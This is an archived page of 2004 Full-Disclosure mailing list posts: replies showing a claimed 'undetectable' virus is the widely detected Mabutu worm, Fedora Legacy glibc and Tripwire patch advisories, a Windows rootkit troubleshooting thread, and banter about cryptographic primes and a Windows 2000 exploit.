OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

  • application/octet-stream attachment: Toy.com
 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Barrie Dempster (barriereboot-robot.net)
Date: Sat Oct 23 2004 - 02:32:07 CDT

This virus is very detectable, It is important to verify a file with a
variety of vendors before labelling it "new" (never - "undetectable").
Your web page only proved that Hotmail's AV scanners didn't pick it up,
nothing more.

---- Pasted results from www.virustotal.com ----
Results of a file scan
This is the report of the scanning done over "details.scr" file that
VirusTotal processed on 10/23/2004 at 09:32:12.

Antivirus
Version
Update
Result
BitDefender
7.0
10.22.2004
Win32.Mabutu.Amm
ClamWin
devel-20041018
10.22.2004
Worm.Mabutu.A-unp
eTrust-Iris
7.1.194.0
10.22.2004
Win32/Mabutu.A.Worm
F-Prot
3.15b
10.22.2004
W32/Mabuto.Bmm
Kaspersky
4.0.2.24
10.23.2004
I-Worm.Mabutu.a
NOD32v2
1.904
10.23.2004
Win32/Mabutu.A
Norman
5.70.10
10.22.2004
Mabutu.Amm
Panda
7.02.00
10.22.2004
W32/Mabutu.A.worm
Sybari
7.5.1314
10.23.2004
Mabutu.Am
Symantec
8.0
10.22.2004
W32.Mota.Bmm
---- END OF Pasted results from www.virustotal.com ----

On Fri, 2004-10-22 at 22:28 +0000, Farrukh Hussain wrote:
> Hi,
> Today I got e-mail from "69.197.83.68" CANADA ISP which has
> undetectable virus. Well I downloaded this file but I didn't run it
> because I know it is virus. and now I am complaining to "rogers.com"
> ISP about this matter. Because I got this file from this ISP. It is
> abuse of internet service. I hope they will take some action about it.
> And also i am informing this matter to security group.
>
> http://www.Anti-Hacking.info/undetectable_virus/index.html
>
>
>
> Best Regards from,
> Farrukh Hussain
> Security Group in Pakistan.
>
> _______________________________________________ Full-Disclosure - We
> believe in it. Charter:
> http://lists.netsys.com/full-disclosure-charter.html
--
Barrie Dempster (zeedo) - Fortiter et Strenue

  http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBegj3sYtTQpYCX9ARArygAJ4i90e3tqWg5GV3E4Lwe8j2h9IigwCfbaIx
voAhkmh/9YzlT+YEahGhacM=
=3GJL
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Nick FitzGerald (nickvirus-l.demon.co.uk)
Date: Sat Oct 23 2004 - 05:40:11 CDT

Andrew Smith to Farrukh Hussain:

> > Today I got e-mail from "69.197.83.68" CANADA ISP which has undetectable
> > virus.
>
> This just means that you or your A/V hasn't updated their virus
> definitions. Try multiple A/V programs, this will cover a wider range
> of 'viruses'.

_OR_ it means Farrukh was depending on an unreliable or outdated virus
scanner.

Scanned with 21 different scanners a few hours after the message was
posted and 20 of them detected it. This was not due to some recent (as
in the preceding few hours) rush of updates -- most web descriptions
agree that the virus they detected was first seen very late in July,
with a second variant a few days later, early in August.

That result _includes_ the same scanner (by name) that Hotmail
reputedly uses, but then, Hotmail failing to reliably keep its scanner
up to date, and/or the supplier of said scanner failing to provide
reliable updates to Hotmail are not exactly news, and it has been long
suspected that Hotmail's virus scanning is designed to "fail open"
(i.e. pass on Email that has not been scanned but report it as if it
has been scanned and found "not infected").

In short, this virus has been widely detected since late July/early
August by almost all "Western" virus detection engines, so the OP's
report and concerns would seem more than a tad misdirected...

--
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [FLSA-2004:1947] Updated glibc packages fix flaws

From: Marc Deslauriers (marcdeslauriersvideotron.ca)
Date: Sat Oct 23 2004 - 06:28:43 CDT

-----------------------------------------------------------------------
               Fedora Legacy Update Advisory

Synopsis: Updated glibc packages fix flaws
Advisory ID: FLSA:1947
Issue date: 2004-10-23
Product: Red Hat Linux
Keywords: Bugfix
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1947
CVE Names: CAN-2002-0029
-----------------------------------------------------------------------

-----------------------------------------------------------------------
1. Topic:

Updated glibc packages that fix a security flaw in the resolver as well
as dlclose handling are now available.

The GNU libc packages (known as glibc) contain the standard C libraries
used by applications.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386

3. Problem description:

A security audit of glibc revealed a flaw in the resolver library which
was originally reported as affecting versions of ISC BIND 4.9. This flaw
also applied to glibc versions before 2.3.2. An attacker who is able to
send DNS responses (perhaps by creating a malicious DNS server) could
remotely exploit this vulnerability to execute arbitrary code or cause a
denial of service. The Common Vulnerabilities and Exposures project
(cve.mitre.org) has assigned the name CAN-2002-0029 to this issue.

All users of glibc should upgrade to these updated packages, which
resolve these issues.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which
are not installed but included in the list will not be updated. Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system. This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - bug #1947

6. RPMs required:

Red Hat Linux 7.3:

SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/glibc-2.2.5-44.legacy.3.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-2.2.5-44.legacy.3.i686.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-common-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-debug-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-debug-2.2.5-44.legacy.3.i686.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-debug-static-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-devel-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-profile-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/glibc-utils-2.2.5-44.legacy.3.i386.rpm
http://download.fedoralegacy.org/redhat/7.3/updates/i386/nscd-2.2.5-44.legacy.3.i386.rpm

7. Verification:

SHA1 sum Package Name
---------------------------------------------------------------------------

787b02c547d9578eab2112b681d58ce40589dd37
7.3/updates/i386/glibc-2.2.5-44.legacy.3.i386.rpm
d73f3bf9fd6c094dbf3d7c0409c0d34de40a1cfd
7.3/updates/i386/glibc-2.2.5-44.legacy.3.i686.rpm
df3fdb0f5d327b10bb285b06a5f1422642b980b7
7.3/updates/i386/glibc-common-2.2.5-44.legacy.3.i386.rpm
61e6c8521d67f38e96c679b3d263f6dccfb43b75
7.3/updates/i386/glibc-debug-2.2.5-44.legacy.3.i386.rpm
d5b070b85a0a57702f3259790e59707dd8d67ef1
7.3/updates/i386/glibc-debug-2.2.5-44.legacy.3.i686.rpm
e8988fb212ad671469f190f01b35c7664298ea58
7.3/updates/i386/glibc-debug-static-2.2.5-44.legacy.3.i386.rpm
f2043d369aeb8a8a39b0f1e429fdbcf08dcefd5b
7.3/updates/i386/glibc-devel-2.2.5-44.legacy.3.i386.rpm
5902d254f9926b0c532e8af5e0fe3ed22e105215
7.3/updates/i386/glibc-profile-2.2.5-44.legacy.3.i386.rpm
6c8b2d53b0626265c180ba09a1a6161e4be6765d
7.3/updates/i386/glibc-utils-2.2.5-44.legacy.3.i386.rpm
26282373e4cd3770b40b3cf10dc17b7f6f23ce6a
7.3/updates/i386/nscd-2.2.5-44.legacy.3.i386.rpm
b8f02cd099305c9866715493147ca9c9dcecfff0
7.3/updates/SRPMS/glibc-2.2.5-44.legacy.3.src.rpm

These packages are GPG signed by Fedora Legacy for security. Our key is
available from http://www.fedoralegacy org/about/security.php

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

    sha1sum <filename>

8. References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0029
http://www.kb.cert.org/vuls/id/844360

9. Contact:

The Fedora Legacy security contact is <secnoticefedoralegacy.org>. More
project details at http://www.fedoralegacy.org

---------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBBekBrLMAs/0C4zNoRAseXAKC6IGUi8a0E1KwzE3XWlQEBbfDTEwCeM9mF
m9tX/zENMqWea1g6qZ9j4EQ=
=2dsU
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Owned by an iPod

From: Matt Johnston (mattjtartarus.uwa.edu.au)
Date: Sat Oct 23 2004 - 05:09:32 CDT

On Fri, Oct 22, 2004 at 10:53:55AM -0700, Dragos Ruiu wrote:
> On October 21, 2004 10:22 pm, Rosalina Hamar wrote:
> > i heart about that demonstration a couple of weeks ago. now
> > it's an official announcement at parsec.jp [0]. since there is not
> > much technical info on that issue in the announcement, i googled
> > around and found a link to an interesting post about the IEEE1394
> > OHCI interface on kerneltrap [1] back in 2002.
> >
> > shish ...
> > rosa
> >
> > [0] http://pacsec.jp/advisories.html
> > [1] http://kerneltrap.org/node/view/145
>
> More technical information on this vulnerability,
> and some of the other vulnerabilities, fixes and
> techniques from the conference will be published
> after the conference.

At least on Mac OS X, a workaround appears to be enabling
an openfirmware password[1]. I assume that most firewire
chipsets would have the capability to disable raw memory
access if the OS asks nicely? Of course whether it's
disabled before the OS loads is another matter...

Matt

[1] http:/matt.ucc.asn.au/apple/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] [FLSA-2004:1719] Updated Tripwire packages fix security flaw

From: Marc Deslauriers (marcdeslauriersvideotron.ca)
Date: Sat Oct 23 2004 - 06:27:30 CDT

-----------------------------------------------------------------------
               Fedora Legacy Update Advisory

Synopsis: Updated Tripwire packages fix security flaw
Advisory ID: FLSA:1719
Issue date: 2004-10-23
Product: Red Hat Linux
Keywords: Security
Cross references: https://bugzilla.fedora.us/show_bug.cgi?id=1719
CVE Names: CAN-2004-0536
-----------------------------------------------------------------------

-----------------------------------------------------------------------
1. Topic:

Updated Tripwire packages that fix a format string security
vulnerability are now available.

2. Relevant releases/architectures:

Red Hat Linux 7.3 - i386
Red Hat Linux 9 - i386

3. Problem description:

Tripwire is a system integrity assessment tool.

Paul Herman discovered a format string vulnerability in Tripwire version
2.3.1 and earlier. If Tripwire is configured to send reports via email,
a local user could gain privileges by creating a carefully crafted file.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CAN-2004-0536 to this issue.

Users of Tripwire are advised to upgrade to this erratum package which
contains a backported security patch to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

To update all RPMs for your particular architecture, run:

rpm -Fvh [filenames]

where [filenames] is a list of the RPMs you wish to upgrade. Only those
RPMs which are currently installed will be updated. Those RPMs which
are not installed but included in the list will not be updated. Note
that you can also use wildcards (*.rpm) if your current directory *only*
contains the desired RPMs.

Please note that this update is also available via yum and apt. Many
people find this an easier way to apply updates. To use yum issue:

yum update

or to use apt:

apt-get update; apt-get upgrade

This will start an interactive process that will result in the
appropriate RPMs being upgraded on your system. This assumes that you
have yum or apt-get configured for obtaining Fedora Legacy content.
Please visit http://www fedoralegacy.org/docs for directions on how to
configure yum and apt-get.

5. Bug IDs fixed:

http://bugzilla.fedora.us - 1719 - Format String Vulnerability in
Tripwire

6. RPMs required:

Red Hat Linux 7.3:

SRPM:
http://download.fedoralegacy.org/redhat/7.3/updates/SRPMS/tripwire-2.3.1-10.1.legacy.7x.src.rpm

i386:
http://download.fedoralegacy.org/redhat/7.3/updates/i386/tripwire-2.3.1-10.1.legacy.7x.i386.rpm

Red Hat Linux 9:

SRPM:
http://download.fedoralegacy.org/redhat/9/updates/SRPMS/tripwire-2.3.1-17.2.legacy.9.src.rpm

i386:
http://download.fedoralegacy.org/redhat/9/updates/i386/tripwire-2.3.1-17.2.legacy.9.i386.rpm

7. Verification:

SHA1 sum Package Name
------------------------------------------------------------------------

1b2a8875e86492065f53db69d04de4a452fb1c5f
7.3/updates/i386/tripwire-2.3.1-10.1.legacy.7x.i386.rpm
3d1d0f2a2b4b27c1e5d3b05dbea78d95c70ddcc2
7.3/updates/SRPMS/tripwire-2.3.1-10.1.legacy.7x.src.rpm
cdc032af7c3fa3cfbe153c85a0044bdbbb6326b5
9/updates/i386/tripwire-2.3.1-17.2.legacy.9.i386.rpm
263704b1799204e8ee98b4329cddf7b492d8fff2
9/updates/SRPMS/tripwire-2.3.1-17.2.legacy.9.src.rpm

These packages are GPG signed by Fedora Legacy for security. Our key is
available from http://www.fedoralegacy org/about/security.php

You can verify each package with the following command:

    rpm --checksig -v <filename>

If you only wish to verify that each package has not been corrupted or
tampered with, examine only the sha1sum with the following command:

    sha1sum <filename>

8. References:

http://marc.theaimsgroup.com/?l=bugtraq&m=108668791510153
http://lw.ftw.zamosc.pl/lha-exploit.txt

9. Contact:

The Fedora Legacy security contact is <secnoticefedoralegacy.org>. More
project details at http://www.fedoralegacy.org

---------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQBBekAhLMAs/0C4zNoRAq9VAJ9oFJ5zRcNClCxyq7KlLrACgYuAhgCgwx2B
fVuHqnCklAZplxt3m/rWtLk=
=OxE7
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] Help, possible rootkit

From: BillyBob (billybobknobhotmail.com)
Date: Sat Oct 23 2004 - 11:05:29 CDT

I have noticed that my XP system is behaving like I have a rootkit.

- My mouse is jumpy (it freezes for a second when I move it around the
desktop) and the minimized Taskmanager in the systray shows I have around
25 - 30 % usage, but when I open it, there is no process listed using this
much.
- I did a netstat, fport, openports and none of these show that I have any
odd ports open or any connections established.
- even when I disconnect from the Internet these symptoms do not stop. They
stop if I reboot, but then start again.

I have ran VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
could not find anything.

Any more suggestions ?
Any more rootkit finding tools for Windows ?

Thanks
Bill

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Isshogei (isshogeiisshogei.de)
Date: Sat Oct 23 2004 - 11:14:00 CDT

sers, i have download this virus and check it with my AVG. he found it. better u use this software --> www.grisoft.com
here a log from AVG:
C:\Documents and Settings\USERNAME\DESKTOP\DETAILS.ZIP:\details\details..scr Virus identified I-Worm/Mabutu

regards

Isshogei

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Isshogei (isshogeiisshogei.de)
Date: Sat Oct 23 2004 - 11:10:51 CDT

sers, i have download this virus and check it with my AVG. he found it. better u use this software --> www.grisoft.com

regards

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
[Full-Disclosure] (no subject)

patrickhats-tech.net
Date: Sat Oct 23 2004 - 11:55:09 CDT

Please make a note of this email address change.

For business related items, please contact me at patrickhendricknetworks.com

For personal emails, please contact me at patrickfedoracore.org

Thank you!

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Help, possible rootkit

From: Michael Rutledge (michael4447gmail.com)
Date: Sat Oct 23 2004 - 12:10:32 CDT

What type of software do you use on a regular basis, and what software
have you installed recently? Is this a new install of XP? Also, have
you installed SP2?

Give us a little background about your system so that we can rule out
common software gliches.

-Michael

On Sat, 23 Oct 2004 13:05:29 -0300, BillyBob <billybobknobhotmail.com> wrote:
> I have noticed that my XP system is behaving like I have a rootkit.
>
> - My mouse is jumpy (it freezes for a second when I move it around the
> desktop) and the minimized Taskmanager in the systray shows I have around
> 25 - 30 % usage, but when I open it, there is no process listed using this
> much.
> - I did a netstat, fport, openports and none of these show that I have any
> odd ports open or any connections established.
> - even when I disconnect from the Internet these symptoms do not stop. They
> stop if I reboot, but then start again.
>
> I have ran VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
> could not find anything.
>
> Any more suggestions ?
> Any more rootkit finding tools for Windows ?
>
> Thanks
> Bill
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Help, possible rootkit

From: ISNYC (admininfosecnyc.com)
Date: Sat Oct 23 2004 - 13:24:37 CDT

I wouldnt run detection tools from the OS, use a BootCD.

Pref: FIRE or Knoppix/Knoppix-STD

FIRE by DMZ Services Inc.
http://fire.dmzs.com/

Knoppix STD 0.1
http://www.knoppix-std.org/

KNOPPIX Bootable Linux CD
http://www.knopper.net/knoppix/index-en.html

Good Luck,
Dominick S.

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
Sent: Saturday, October 23, 2004 12:05 PM
To: Full Disclosure
Subject: [Full-Disclosure] Help, possible rootkit

I have noticed that my XP system is behaving like I have a rootkit.

- My mouse is jumpy (it freezes for a second when I move it around the
desktop) and the minimized Taskmanager in the systray shows I have around 25
- 30 % usage, but when I open it, there is no process listed using this
much.
- I did a netstat, fport, openports and none of these show that I have any
odd ports open or any connections established.
- even when I disconnect from the Internet these symptoms do not stop. They
stop if I reboot, but then start again.

I have ran VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
could not find anything.

Any more suggestions ?
Any more rootkit finding tools for Windows ?

Thanks
Bill

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Crypto and Primes

From: Andrew (notesshaw.ca)
Date: Sat Oct 23 2004 - 13:25:16 CDT

And .. where would you get all of those primes? My rough estimate says
that even if every person on the planet (6,000,000,000) turned on their PC
capable of generating random 512 bit primes at the rate of 100 trillion
(100,000,000,000,000) primes per second it would still take way more than
1e100 TIMES the age of the universe(!) to even bring the chances of getting
a particular 512 bit prime to the odds of 1 in a billion.

Age of the universe given as 18 billion years, which is rounded up to the
highest billion years from the oldest estimate, found at:
http://www.astro.ucla.edu/~wright/age.html ymmv.

Reality parody. Not to be taken seriously.
Professional driver on a closed course.
Do not try this at home.

  - A

At 07:33 PM 10/22/2004, Jeremy Bishop wrote:
>On Friday 22 October 2004 14:31, Daniel Sichel wrote:
>
> > Depending on how rigourous you are being, the large in large numbers
> > is a relative term. I know from talking to someone who has worked in
> > for real government crypto that there is enough storage space to
> > create a lookup db of a good chunk (if not all) of the PGP crypto
> > keys in use for common key sizes (512 and 1024). I doubt SSL is less
> > vulnerable. I guess there's force, brute force, and brute force with
> > taxpayer dollars.
>
>If you are speaking of a database in which you could look up different
>keys, of course it's possible. I suggest http://pgp.mit.edu/ for an
>example of such a system.
>
>If you are thinking of the primes involved in these keys, I would like
>to direct your attention to this quote:
>
>----
>RSA is typically performed using 512bit prime numbers. There are
>approximately 3.778e151 such prime numbers. Using the advanced storage
>technology available to the NSA, it should be possible to store a 512
>bit number in a single hydrogen atom. A typical universe (e.g. ours)
>contains approximately 1e90 hydrogen atoms. If the NSA has hidden
>3.778e61 universes in an inconspicious little building in Maryland,
>astronomers should notice some deviations in the gravity field in the
>area.
>
>(HansM; http://web.ukonline.co.uk/eric.price/humour/hum0110.htm)
>----
>
>A more interesting question might be, in this case, how would a
>government know which of those primes have been used. This information
>would be feasible to store, but would require compromising just about
>every random number generator in use by the crypto-fanatics who make
>use of PGP.
>
> > Also with cheapo Linux clusters I would think a determined
> > hackmeister could do a crack on large prime based crypto, whether
> > that would be computationally feasible in a relevant time frame, I
> > don't know. I do know my gut tells me SSL is cryptographically weak
> > and I refuse to use it in place of IPSEC.
>
>In that case, I assume you are using IPSEC with shared secrets instead
>of certificates, no?
>
>--
>The universe does not have laws -- it has habits, and habits can
>be broken.
> -- BSD fortune file

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Windows 2000 Remote Buffer Overflow by class101

From: J.A. Terranson (measlmfn.org)
Date: Sat Oct 23 2004 - 13:08:27 CDT

On Fri, 22 Oct 2004, Danny wrote:

> > "Stack based overflow, bug discovered by Luigi Auriemma
> > aluigi.altervista.org
> > Tested working on Win2K, This public version crash on any WinXP, read
> > the code why.
> > The exploit bind a shellcode on the victim port 101."
>
> What does Microsoft say in response?

In a news conference where Mr. Bill was approached with this very
question, he is reported to have stated that "The Windows Operating System
is the most secure piece of crap, er, um, code ever written. Micro$loth
emphatically denies that this is anything but the most minor of issues,
and doesn't even rise to the level of threat necessary to achieve public
commentary. Therefore, Micro$loth has no comment. Thank you, and good
night.".

--
Yours,

J.A. Terranson
sysadminmfn.org
0xBD4A95BF

        "An ill wind is stalking
        while evil stars whir
        and all the gold apples
        go bad to the core"

        S. Plath, Temper of Time

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [Full-Disclosure] Help, possible rootkit

From: Alan Melia (Melmac) (alanmemelmac.co.uk)
Date: Sat Oct 23 2004 - 14:47:15 CDT

First check to see what processes are running. TaskList is built in but I
would recommend.
http://www.sysinternals.com/ntw2k/freeware/procexp.shtml

Get to know your machine and what processes are running normally. With
25-30% CPU it should stick out like a sore thumb.

Oh yeah don't run as admin (see http://blogs.msdn.com/aaron_margosis).

Alan
 

-----Original Message-----
From: full-disclosure-adminlists.netsys.com
[mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
Sent: 23 October 2004 17:05
To: Full Disclosure
Subject: [Full-Disclosure] Help, possible rootkit

I have noticed that my XP system is behaving like I have a rootkit.

- My mouse is jumpy (it freezes for a second when I move it around the
desktop) and the minimized Taskmanager in the systray shows I have around
25 - 30 % usage, but when I open it, there is no process listed using this
much.
- I did a netstat, fport, openports and none of these show that I have any
odd ports open or any connections established.
- even when I disconnect from the Internet these symptoms do not stop. They
stop if I reboot, but then start again.

I have ran VICE, Klister, PatchFinder and RkDetect from rootkit.com and they
could not find anything.

Any more suggestions ?
Any more rootkit finding tools for Windows ?

Thanks
Bill

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Help, possible rootkit

From: BillyBob (billybobknobhotmail.com)
Date: Sat Oct 23 2004 - 15:30:22 CDT

I have ran Process Explorer, Code Stuff Starter but nothing shows up in the
list as using this 25-30% of my CYP. I also updated and ran PestPatrol,
NortonAV, etc but nothing is detected which is why I think I have a rootkit
that has patched the kernel and therefore not allowing any of these programs
to detect it.

Anything else ?

----- Original Message -----
From: "Alan Melia (Melmac)" <alanmemelmac.co.uk>
To: "'BillyBob'" <billybobknobhotmail.com>; "'Full Disclosure'"
<full-disclosurelists.netsys.com>
Sent: Saturday, October 23, 2004 4:47 PM
Subject: RE: [Full-Disclosure] Help, possible rootkit

> First check to see what processes are running. TaskList is built in but I
> would recommend.
> http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
>
> Get to know your machine and what processes are running normally. With
> 25-30% CPU it should stick out like a sore thumb.
>
> Oh yeah don't run as admin (see )http://blogs.msdn.com/aaron_margosis.
>
> Alan
>
>
> -----Original Message-----
> From: full-disclosure-adminlists.netsys.com
> [mailto:full-disclosure-adminlists.netsys.com] On Behalf Of BillyBob
> Sent: 23 October 2004 17:05
> To: Full Disclosure
> Subject: [Full-Disclosure] Help, possible rootkit
>
> I have noticed that my XP system is behaving like I have a rootkit.
>
> - My mouse is jumpy (it freezes for a second when I move it around the
> desktop) and the minimized Taskmanager in the systray shows I have around
> 25 - 30 % usage, but when I open it, there is no process listed using this
> much.
> - I did a netstat, fport, openports and none of these show that I have any
> odd ports open or any connections established.
> - even when I disconnect from the Internet these symptoms do not stop.
They
> stop if I reboot, but then start again.
>
> I have ran VICE, Klister, PatchFinder and RkDetect from rootkit.com and
they
> could not find anything.
>
> Any more suggestions ?
> Any more rootkit finding tools for Windows ?
>
> Thanks
> Bill
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
RE: [inbox] Re: [Full-Disclosure] Help, possible rootkit

From: Exibar (exibarthelair.com)
Date: Sat Oct 23 2004 - 15:45:30 CDT

Perhaps is a piece of spyware and not a rootkit afterall? Spyware would be
a more common item to find on a computer system than a rootkit. Run
Spoybot: search and destroy and Adaware on your machine.

  How up to date is your Antivirus as well? Did you run a full antivirus
scan on your system to rule out a virus?

  Exibar

> -----Original Message-----
> From: Michael Rutledge [mailto:michael4447gmail.com]
> Sent: Saturday, October 23, 2004 1:11 PM
> To: BillyBob
> Cc: Full Disclosure
> Subject: [inbox] Re: [Full-Disclosure] Help, possible rootkit
>
>
> What type of software do you use on a regular basis, and what software
> have you installed recently? Is this a new install of XP? Also, have
> you installed SP2?
>
> Give us a little background about your system so that we can rule out
> common software gliches.
>
> -Michael
>
>
> On Sat, 23 Oct 2004 13:05:29 -0300, BillyBob
> <billybobknobhotmail.com> wrote:
> > I have noticed that my XP system is behaving like I have a rootkit.
> >
> > - My mouse is jumpy (it freezes for a second when I move it around the
> > desktop) and the minimized Taskmanager in the systray shows I
> have around
> > 25 - 30 % usage, but when I open it, there is no process listed
> using this
> > much.
> > - I did a netstat, fport, openports and none of these show that
> I have any
> > odd ports open or any connections established.
> > - even when I disconnect from the Internet these symptoms do
> not stop. They
> > stop if I reboot, but then start again.
> >
> > I have ran VICE, Klister, PatchFinder and RkDetect from
> rootkit.com and they
> > could not find anything.
> >
> > Any more suggestions ?
> > Any more rootkit finding tools for Windows ?
> >
> > Thanks
> > Bill
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
Re: [Full-Disclosure] Undetectable Virus from CANADA ISP 69.197.83.68

From: Barrie Dempster (barriereboot-robot.net)
Date: Sat Oct 23 2004 - 17:49:12 CDT

This virus is very detectable, It is important to verify a file with a
variety of vendors before labelling it "new" (never - "undetectable").
Your web page only proved that Hotmail's AV scanners didn't pick it up,
nothing more.

---- Pasted results from www.virustotal.com ----
Results of a file scan
This is the report of the scanning done over "details.scr" file that
VirusTotal processed on 10/23/2004 at 09:32:12.

Antivirus
Version
Update
Result
BitDefender
7.0
10.22.2004
Win32.Mabutu.Amm
ClamWin
devel-20041018
10.22.2004
Worm.Mabutu.A-unp
eTrust-Iris
7.1.194.0
10.22.2004
Win32/Mabutu.A.Worm
F-Prot
3.15b
10.22.2004
W32/Mabuto.Bmm
Kaspersky
4.0.2.24
10.23.2004
I-Worm.Mabutu.a
NOD32v2
1.904
10.23.2004
Win32/Mabutu.A
Norman
5.70.10
10.22.2004
Mabutu.Amm
Panda
7.02.00
10.22.2004
W32/Mabutu.A.worm
Sybari
7.5.1314
10.23.2004
Mabutu.Am
Symantec
8.0
10.22.2004
W32.Mota.Bmm
---- END OF Pasted results from www.virustotal.com ----

On Fri, 2004-10-22 at 22:28 +0000, Farrukh Hussain wrote:
> Hi,
> Today I got e-mail from "69.197.83.68" CANADA ISP which has
> undetectable virus. Well I downloaded this file but I didn't run it
> because I know it is virus. and now I am complaining to "rogers.com"
> ISP about this matter. Because I got this file from this ISP. It is
> abuse of internet service. I hope they will take some action about it.
> And also i am informing this matter to security group.
>
> http://www.Anti-Hacking.info/undetectable_virus/index.html
>
>
>
> Best Regards from,
> Farrukh Hussain
> Security Group in Pakistan.
>
> _______________________________________________ Full-Disclosure - We
> believe in it. Charter:
> http://lists.netsys.com/full-disclosure-charter.html
--
Barrie Dempster (zeedo) - Fortiter et Strenue

  http://www.bsrf.org.uk

[ gpg --recv-keys --keyserver www.keyserver.net 0x96025FD0 ]

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)

iD8DBQBBet/nsYtTQpYCX9ARAs9RAJ4lKkioLDVEqS5FQjFyshoLxKoYMACgtNzm
